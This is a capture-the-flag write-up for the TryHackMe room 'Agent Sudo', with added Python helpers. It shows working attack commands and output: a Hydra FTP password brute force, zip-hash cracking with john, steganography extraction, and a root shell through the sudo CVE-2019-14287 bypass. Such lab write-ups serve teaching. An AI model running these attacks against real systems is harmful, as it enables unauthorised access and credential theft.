THM: Agent Sudo

Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.124.139 -oA nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 22:33 GMT
Nmap scan report for 10.10.124.139
Host is up (0.040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.58 seconds
Website
Nmap didn't report anonymous FTP access, so let's start with the website.
The message on the page suggests we need to put a value into the User-Agent request header. The agent codenames are single letters, so using the developer tools in Firefox we can edit and resend the request, changing the header each time. Cycling through the letters, when we get to C we are shown a different message, which also reveals a potential username.
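The manual cycling above can be scripted. The following is an added example, not code from the original writeup: it sends one request per candidate User-Agent and reports the ones whose response differs from a normal browser's. The target URL path is an assumption (the page only shows the host), and the offline_fetch stand-in returns constructed responses so the logic can be run without the box.

```python
import string
import urllib.error
import urllib.request

# Assumed target URL: the page only shows the host, the path is an assumption.
TARGET_URL = "http://10.10.124.139/"


def fetch(url, user_agent, timeout=10):
    """GET url with the given User-Agent and return (status, body).
    urllib follows redirects, so a 302 to an agent-specific page shows up as a
    different final body rather than as a different status code."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def find_odd_agents(url, candidates, fetch_fn=fetch, baseline_ua="Mozilla/5.0"):
    """Request url once per candidate User-Agent and return a dict of those
    whose (status, body) differs from the baseline response.
    Caveat: pages with per-request dynamic content (timestamps, CSRF tokens)
    will always differ; strip those or compare status and length instead."""
    baseline = fetch_fn(url, baseline_ua)
    hits = {}
    for ua in candidates:
        resp = fetch_fn(url, ua)
        if resp != baseline:
            hits[ua] = resp
    return hits


# Constructed offline stand-in for the server (no real page content): only the
# User-Agent "C" answers differently, mirroring the behaviour described above.
_OFFLINE_RESPONSES = {"C": (200, "different page for agent C (constructed)")}


def offline_fetch(url, user_agent):
    return _OFFLINE_RESPONSES.get(user_agent, (200, "default page (constructed)"))


if __name__ == "__main__":
    # Against the real box, swap offline_fetch for the default fetch.
    for ua, (status, body) in find_odd_agents(TARGET_URL, string.ascii_uppercase,
                                              fetch_fn=offline_fetch).items():
        print(f"User-Agent: {ua} -> HTTP {status}, {len(body)} bytes")
        print(body[:300])
```

Running it against the live host means dropping the fetch_fn argument; the single-letter codenames are just the candidate list, so the same function works for any wordlist of agent strings.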
FTP
Using Hydra we can brute-force the FTP login for the user chris:
# hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.124.139 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service
organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-12 22:56:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525
[DATA] attacking ftp://10.10.124.139:21/
[21][ftp] host: 10.10.124.139 login: chris password: c*****l
[STATUS] 14344399.00 tries/min, 14344399 tries in 00:01h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-12 22:57:23
Now let's connect and download all the files:
# ftp -A 10.10.124.139
Connected to 10.10.124.139.
220 (vsFTPd 3.0.3)
Name (10.10.124.139:root): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp> prompt
Interactive mode off.
ftp> mget *.*
local: To_agentJ.txt remote: To_agentJ.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |******************************************************| 217 2.79 MiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (10.27 KiB/s)
local: cute-alien.jpg remote: cute-alien.jpg
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
100% |******************************************************| 33143 788.99 KiB/s 00:00 ETA
226 Transfer complete.
33143 bytes received in 00:00 (529.47 KiB/s)
local: cutie.png remote: cutie.png
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
100% |******************************************************| 34842 822.90 KiB/s 00:00 ETA
226 Transfer complete.
34842 bytes received in 00:00 (556.46 KiB/s)
Decoding
We now have three files: a text file and two images. The text file contains the following message, indicating that something is hidden in the images:
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
We use binwalk to check the images, and it looks like the PNG file has a zip archive appended to it:
# binwalk -e cutie.png --run-as=root
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
# ls _cutie.png.extracted
365 365.zlib 8702.zip
So we now have the extracted 8702.zip, but it is password protected. Let's extract the hash with zip2john and crack it with john:
# zip2john 8702.zip > hash
# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
a**** (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2025-03-12 23:22) 1.562g/s 38400p/s 38400c/s 38400C/s michael!..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we unzip the file with 7z e 8702.zip and enter the password when prompted. This gives us another text file:
To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
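The binwalk carve and the zip2john/john crack above can be reproduced in a few dozen lines of Python. This is an added example, not part of the original writeup: carve_zip finds the embedded archive by its local-file-header and end-of-central-directory signatures (the same offsets binwalk reported), and crack_zip runs a dictionary attack using the standard library. One caveat: john identified the room's archive as WinZip AES (PBKDF2-SHA1), which Python's zipfile cannot decrypt, so the sample here uses the legacy ZipCrypto scheme that zipfile does support; the carving step is the same either way, and john handles both formats. The sample PNG prefix, member name, password and wordlist are all constructed for the demo.

```python
import struct
import zipfile
import zlib
from io import BytesIO

LFH_SIG = b"PK\x03\x04"   # ZIP local file header signature
EOCD_SIG = b"PK\x05\x06"  # ZIP end-of-central-directory signature


def carve_zip(blob):
    """Return the first ZIP archive embedded in blob (what binwalk -e did), or
    None. Heuristic carve: from the first local-file-header signature to the
    end of the EOCD record (22 bytes plus the comment length it declares)."""
    start = blob.find(LFH_SIG)
    eocd = blob.find(EOCD_SIG, start) if start >= 0 else -1
    if eocd < 0:
        return None
    comment_len = struct.unpack_from("<H", blob, eocd + 20)[0]
    return blob[start:eocd + 22 + comment_len]


def crack_zip(zip_bytes, wordlist):
    """Dictionary attack on the first encrypted member of a ZipCrypto archive.
    A wrong password normally fails the 12-byte header check byte (RuntimeError);
    the 1-in-256 that pass it then fail the CRC-32 of the decrypted data
    (BadZipFile). Returns the working password or None."""
    with zipfile.ZipFile(BytesIO(zip_bytes)) as zf:
        target = next((i for i in zf.infolist() if i.flag_bits & 0x1), None)
        if target is None:
            return None
        for pwd in wordlist:
            try:
                zf.read(target.filename, pwd=pwd.encode())
                return pwd
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None


# --- Constructed sample: a ZipCrypto-encrypted archive appended to a PNG header,
# --- so the two functions above can be exercised without the box.
_CRC_TABLE = []
for _n in range(256):
    for _ in range(8):
        _n = (_n >> 1) ^ 0xEDB88320 if _n & 1 else _n >> 1
    _CRC_TABLE.append(_n)


def _zipcrypto_encrypt(password, plaintext, crc):
    """Traditional PKWARE encryption (APPNOTE 6.1): three running keys seeded
    from the password, a 12-byte header whose last byte is the high byte of the
    member's CRC-32, then every byte XORed with the keystream."""
    k0, k1, k2 = 0x12345678, 0x23456789, 0x34567890

    def crc_step(val, byte):
        return (val >> 8) ^ _CRC_TABLE[(val ^ byte) & 0xFF]

    def update_keys(byte):
        nonlocal k0, k1, k2
        k0 = crc_step(k0, byte)
        k1 = ((k1 + (k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        k2 = crc_step(k2, k1 >> 24)

    for b in password:
        update_keys(b)
    out = bytearray()
    for b in bytes(11) + bytes([crc >> 24]) + plaintext:  # header not random: demo only
        k = k2 | 2
        out.append(b ^ (((k * (k ^ 1)) >> 8) & 0xFF))
        update_keys(b)
    return bytes(out)


def build_encrypted_zip(name, data, password):
    """Minimal stored (method 0) ZIP with one ZipCrypto-encrypted member."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    body = _zipcrypto_encrypt(password, data, crc)
    dos_date = ((2019 - 1980) << 9) | (10 << 5) | 29  # any valid DOS date
    nm = name.encode()
    local = struct.pack("<4sHHHHHIIIHH", LFH_SIG, 20, 1, 0, 0, dos_date,
                        crc, len(body), len(data), len(nm), 0) + nm + body
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, 1, 0, 0,
                          dos_date, crc, len(body), len(data), len(nm),
                          0, 0, 0, 0, 0, 0) + nm
    eocd = struct.pack("<4sHHHHIIH", EOCD_SIG, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


SAMPLE_PASSWORD = "s3cret-demo"                               # hypothetical password
SAMPLE_PNG_PREFIX = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64       # stand-in for image bytes
SAMPLE_FILE = SAMPLE_PNG_PREFIX + build_encrypted_zip(
    "hidden.txt", b"constructed sample member\n", SAMPLE_PASSWORD.encode())
SAMPLE_WORDLIST = ["password", "123456", "letmein", SAMPLE_PASSWORD, "qwerty"]

if __name__ == "__main__":
    carved = carve_zip(SAMPLE_FILE)
    print("zip at offset", hex(SAMPLE_FILE.find(LFH_SIG)), "size", len(carved))
    print("password:", crack_zip(carved, SAMPLE_WORDLIST))
```

For a real image, read the file into a bytes object and pass it to carve_zip; for rockyou-sized wordlists use john or hashcat rather than this loop, since Python's per-candidate ZipFile.read is far slower than a dedicated cracker.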
The quoted value looks encoded; decoding it in CyberChef reveals it is "Area51" in base64. Now let's turn our attention to the remaining file and check it for steganography (as the room's questions hint). The decoded value is the obvious candidate for the steghide passphrase:
# steghide info cute-alien.jpg
"cute-alien.jpg":
format: jpeg
capacity: 1.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "message.txt":
size: 181.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
# steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
Finally, reading the extracted message gives us another username and a password:
Hi james,
Glad you find this message. Your login password is h**********!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
SSH
The credentials work and we can log in as james over SSH. The user.txt flag is in the home directory, so we cat it out and move on. There is also an image for one of the questions; simply use scp to copy it back and reverse image search it to get the answer. Now onto root!
Privilege escalation
Checking our sudo privileges with sudo -l, there is an entry allowing james to run /bin/bash as any user apart from root. Combined with the installed sudo version (1.8.21p2, older than the 1.8.28 release that fixed it), that runas restriction makes the system vulnerable to CVE-2019-14287: sudo's !root check compares the requested user ID against 0, and -1 (or 4294967295) is not 0 so it passes, yet setresuid() treats -1 as "leave unchanged" and the command runs with the uid 0 that sudo already holds. So sudo -u#-1 /bin/bash gives us a root shell and the final flag:
james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# cd /root
root@agent-sudo:/root# ls
root.txt
root@agent-sudo:/root# cat root.txt
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
b******************************2
By,
****** a.k.a Agent R
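As a quick triage check for this class of sudo misconfiguration, the following added example (not code from the original writeup) parses sudo -l output for (ALL, !root) style entries and compares the installed version against the 1.8.28 fix. The sudo -l listing below is constructed to match the page's description; the page itself does not show the real listing, so treat it as illustrative input only.

```python
import re

# First sudo release fixing CVE-2019-14287 (runas user ID -1 / 4294967295
# slipping past a "!root" exclusion and running the command as uid 0).
SUDO_FIXED_VERSION = (1, 8, 28, 0)


def parse_sudo_version(text):
    """Turn a 'sudo --version' string containing '1.8.21p2' into (1, 8, 21, 2);
    a missing 'pN' suffix counts as 0 so plain releases compare correctly."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised sudo version: {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


# One 'sudo -l' command line: "(runas_users[: runas_groups]) [TAG: ...] command"
_RUNAS_LINE = re.compile(
    r"^\s*\((?P<users>[^):]*)(?::[^)]*)?\)\s*(?:[A-Z]+:\s*)*(?P<cmd>\S.*)$")


def excluded_root_entries(sudo_l_output):
    """Return (runas_users, command) for lines whose runas list is of the form
    (ALL, !root) or (ALL, !#0): every user except root is permitted."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = _RUNAS_LINE.match(line)
        if not m:
            continue
        users = [u.strip() for u in m.group("users").split(",")]
        if "ALL" in users and any(u in ("!root", "!#0") for u in users):
            hits.append((m.group("users").strip(), m.group("cmd").strip()))
    return hits


def cve_2019_14287_candidates(sudo_l_output, version_text):
    """Commands that 'sudo -u#-1 <command>' would run as root: needs an
    (ALL, !root) style entry and a sudo older than 1.8.28. The !root check
    compares the requested user ID with 0; -1 is not 0 so it passes, but
    setresuid(-1) means 'leave unchanged' and sudo is already running as root."""
    if parse_sudo_version(version_text) >= SUDO_FIXED_VERSION:
        return []
    return [cmd for _, cmd in excluded_root_entries(sudo_l_output)]


# Constructed 'sudo -l' output consistent with the page's description.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
    (ALL) NOPASSWD: /usr/bin/id
"""

if __name__ == "__main__":
    for cmd in cve_2019_14287_candidates(SAMPLE_SUDO_L, "Sudo version 1.8.21p2"):
        print(f"vulnerable: sudo -u#-1 {cmd}")
```

On a real host feed it the output of sudo -l and sudo --version; note that the (ALL) entry without the !root exclusion is correctly ignored, since it is already a direct root escalation rather than an instance of this bug.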